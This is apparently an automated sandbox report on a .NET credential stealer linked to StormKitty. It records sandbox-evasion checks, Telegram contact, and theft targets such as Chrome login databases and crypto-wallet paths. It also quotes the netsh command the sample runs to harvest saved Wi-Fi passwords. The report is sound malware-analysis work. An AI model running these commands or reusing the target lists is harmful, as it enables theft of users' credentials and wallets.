                                  Source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                  Source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_03259628
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0325CB38
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_03258D58
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_03258A10
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0329CAC7
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0329CAD8
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_03297669
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_03297678
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_03291D60
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_03291D70
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameClient.exe. vs file.exe
                                  Source: file.exe, 00000000.00000002.741020710.00000000014E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                                  Source: file.exeBinary or memory string: OriginalFilenameClient.exe. vs file.exe
                                  Source: file.exeVirustotal: Detection: 74%
                                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                                  Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                                  Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7
                                  Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\tmp27E2.tmp
                                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@17/129@5/4
                                  Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Pictures\desktop.ini
                                  Source: tmp2841.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                  Source: file.exe, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                  Source: file.exe, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                  Source: C:\Users\user\Desktop\file.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                                  Source: file.exe, Client/Settings.csBase64 encoded string: 'UkjGpQUwFoOCoPzB6MXcmJSBfKqbQ9j878lXFtrmhKsFUtYZ2uTRZT2szc9FnBnPh3wqJ4jmrkGc3GawPagQ5E9ZxE/sDr5imAl+YzoNodVDUZTiBczxVKYG61cYSyNZ', 'XK+EdSA5tK0jRtvK17IGrXmy/RaTow/RZQIIjQl4RECdyKto+0C9sOfHLwLaK/pziEz21AjCm9C5pcv1nngL6g==', 'UQLJJoRj3nyLwsy2KjJKnrH5OckV7jGbN8NtoWbphwbpFou5YzCwdFo146ZtPjkTY7nh3C9/Hjf0DMfiFk11Rg==', 'vtHJxl+VdtBxGWMrbtCU5ZRjrqH+C6vCZXELnorV1QkEXkJdt3q1YYl+J9G0r/GiG9kxFPSuC9qFVoCGAdwWVA==', 'i9AWzIWHXgJ4dLCcruM7xUfTXSc0XoSFneFXqcRj7NLzX2ZVYRzZCdTrTyX34SRL50bmBeG7osSgHcfGbfCadZoQYpMVX7ZRm4dolhnatx0=', 'r+/rXOpGCNKFu3Qao3m7a15p2NcRGdeTFburmla8LvPHUtLyo0ubtNlMAtPPxIVq5ryCFsF9oHNBkMr6djMLzA==', 'uUkG8BL0aacdJsigtFoM+k2dlhFaJeW8f/C6chx4PatrXDs8S1c0zb2S0natf78l2J15aiFf/qLcck+e8Zekeg=='
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Settings.csBase64 encoded string: 'UkjGpQUwFoOCoPzB6MXcmJSBfKqbQ9j878lXFtrmhKsFUtYZ2uTRZT2szc9FnBnPh3wqJ4jmrkGc3GawPagQ5E9ZxE/sDr5imAl+YzoNodVDUZTiBczxVKYG61cYSyNZ', 'XK+EdSA5tK0jRtvK17IGrXmy/RaTow/RZQIIjQl4RECdyKto+0C9sOfHLwLaK/pziEz21AjCm9C5pcv1nngL6g==', 'UQLJJoRj3nyLwsy2KjJKnrH5OckV7jGbN8NtoWbphwbpFou5YzCwdFo146ZtPjkTY7nh3C9/Hjf0DMfiFk11Rg==', 'vtHJxl+VdtBxGWMrbtCU5ZRjrqH+C6vCZXELnorV1QkEXkJdt3q1YYl+J9G0r/GiG9kxFPSuC9qFVoCGAdwWVA==', 'i9AWzIWHXgJ4dLCcruM7xUfTXSc0XoSFneFXqcRj7NLzX2ZVYRzZCdTrTyX34SRL50bmBeG7osSgHcfGbfCadZoQYpMVX7ZRm4dolhnatx0=', 'r+/rXOpGCNKFu3Qao3m7a15p2NcRGdeTFburmla8LvPHUtLyo0ubtNlMAtPPxIVq5ryCFsF9oHNBkMr6djMLzA==', 'uUkG8BL0aacdJsigtFoM+k2dlhFaJeW8f/C6chx4PatrXDs8S1c0zb2S0natf78l2J15aiFf/qLcck+e8Zekeg=='
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
                                  Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
                                  Source: file.exeString found in binary or memory: \servers.dat-launcher_profiles.json/\launcher_profiles.json
                                  Source: C:\Users\user\Desktop\file.exe File written: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini
                                  Source: file.exe, Client/Modules/Implant/StringsCrypt.csCryptographic APIs: 'CreateDecryptor'
                                  Source: file.exe, Client/Modules/StringsCrypt.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Modules/StringsCrypt.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Modules/Implant/StringsCrypt.csCryptographic APIs: 'CreateDecryptor'
                                  Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts
                                  Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                  Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                  Data Obfuscation

                                  Source: file.exe, Client/Handle_Packet/Packet.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Handle_Packet/Packet.cs .Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                                  Source: file.exe Static PE information: 0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]

                                  Boot Survival

                                  Source: Yara match File source: file.exe, type: SAMPLE
                                  Source: Yara match File source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  Source: Yara match File source: file.exe, type: SAMPLE
                                  Source: Yara match File source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Source: file.exe Binary or memory string: SBIEDLL.DLL
                                  Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -100000s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6904 Thread sleep count: 2775 > 30
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -99860s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -99703s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -99594s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -99484s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -99371s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -99266s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -99156s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -99950s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -99844s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -99734s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 5708 Thread sleep time: -55000s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\Desktop\file.exe Last function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2775
                                  Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                                  Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                                  Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 100000
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99860
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99703
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99594
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99484
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99371
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99266
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99156
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99950
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99844
                                  Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 99734
                                  Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
                                  Source: file.exe, 00000000.00000003.537661851.0000000005F46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
                                  Source: file.exe Binary or memory string: vmware
                                  Source: file.exe, 00000000.00000003.531320130.0000000005808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware1X_6NRP3Win32_VideoControllerL_UETA9DVideoController120060621000000.000000-0001440163.display.infMSBDAF8HBZTSTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsL_8L9NDNq
                                  Source: file.exe, 00000000.00000003.531320130.0000000005808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware1X_6NRP3Win32_VideoControllerL_UETA9DVideoController120060621000000.000000-0001440163.display.infMSBDAF8HBZTSTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsL_8L9NDN
                                  Source: file.exe, 00000000.00000003.527831715.0000000005738000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.531682684.0000000005742000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.529572531.0000000005742000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.744913180.0000000005745000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\P
                                  Source: file.exe, 00000000.00000003.537661851.0000000005F46000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware1X_6NRP3Win32_VideoControllerL_UETA9DVideoController120060621000000.000000-0001440163.display.infMSBDAF8HBZTSTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsL_8L9NDNLMEMp
                                  Source: file.exe Binary or memory string: VMwareVBox
                                  Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
                                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_03297B98 LdrInitializeThunk,0_2_03297B98
                                  Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard
                                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr All
                                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
                                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid

                                  Language, Device and Operating System Detection

                                  Source: Yara match File source: file.exe, type: SAMPLE
                                  Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                                  Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
                                  Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  Source: Yara match File source: file.exe, type: SAMPLE
                                  Source: Yara match File source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                                  Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                  Source: file.exe, 00000000.00000003.527831715.0000000005738000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.537445553.0000000005DB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.744993454.0000000005751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.529572531.0000000005751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.537910908.000000000574F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.531682684.0000000005753000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                                  Stealing of Sensitive Information

                                  Source: Yara match File source: file.exe, type: SAMPLE
                                  Source: Yara match File source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Source: Yara match File source: file.exe, type: SAMPLE
                                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                                  Source: Yara match File source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Electrum#\Electrum\wallets
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus+\Exodus\exodus.wallet
                                  Source: file.exe, 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Ethereum%\Ethereum\keystore
                                  Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                  Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History

                                  Remote Access Functionality

                                  Source: Yara match File source: file.exe, type: SAMPLE
                                  Source: Yara match File source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 131 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: 1 Scheduled Task/Job; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 Scheduled Task/Job; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 11 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 Masquerading; 241 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 1 OS Credential Dumping; 11 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 File and Directory Discovery; 144 System Information Discovery; 341 Security Software Discovery; 1 Process Discovery; 241 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: 11 Archive Collected Data; 2 Data from Local System; 11 Input Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: 1 Data Encrypted for Impact; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
[Behavior graph: ID 893767, sample file.exe, start date 23/06/2023, architecture WINDOWS, score 100. Process tree: file.exe started two cmd.exe processes; the first started netsh.exe, conhost.exe, findstr.exe and chcp.com, the second started netsh.exe, conhost.exe and chcp.com. Signatures attached to the first cmd.exe: "Uses netsh to modify the Windows network and firewall settings" and "Tries to harvest and steal WLAN passwords".]

Source | Detection | Scanner | Label
file.exe | 75% | Virustotal |
file.exe | 100% | Avira | HEUR/AGEN.1307527
file.exe | 100% | Joe Sandbox ML |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
202.200.1.0.in-addr.arpa | 0% | Virustotal |

Source | Detection | Scanner | Label
https://api.telegram.org4 | 0% | URL Reputation | safe
https://api.telegram | 0% | URL Reputation | safe
https://api.telegram | 0% | URL Reputation | safe
http://crl.microsoft.c | 0% | URL Reputation | safe
https://api.mylnikov.org4 | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13 | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.mylnikov.org | 172.67.196.114 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
icanhazip.com | 104.18.114.97 | true | false | | high
202.200.1.0.in-addr.arpa | unknown | unknown | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
172.67.196.114 | api.mylnikov.org | United States | 13335 | CLOUDFLARENETUS | false
104.18.114.97 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | false

IP
127.0.0.1
Joe Sandbox Version: 37.1.0 Beryl
Analysis ID: 893767
Start date and time: 2023-06-23 21:20:14 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: file.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@17/129@5/4
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 11
• Number of non-executed functions: 7
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): WMIADAP.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
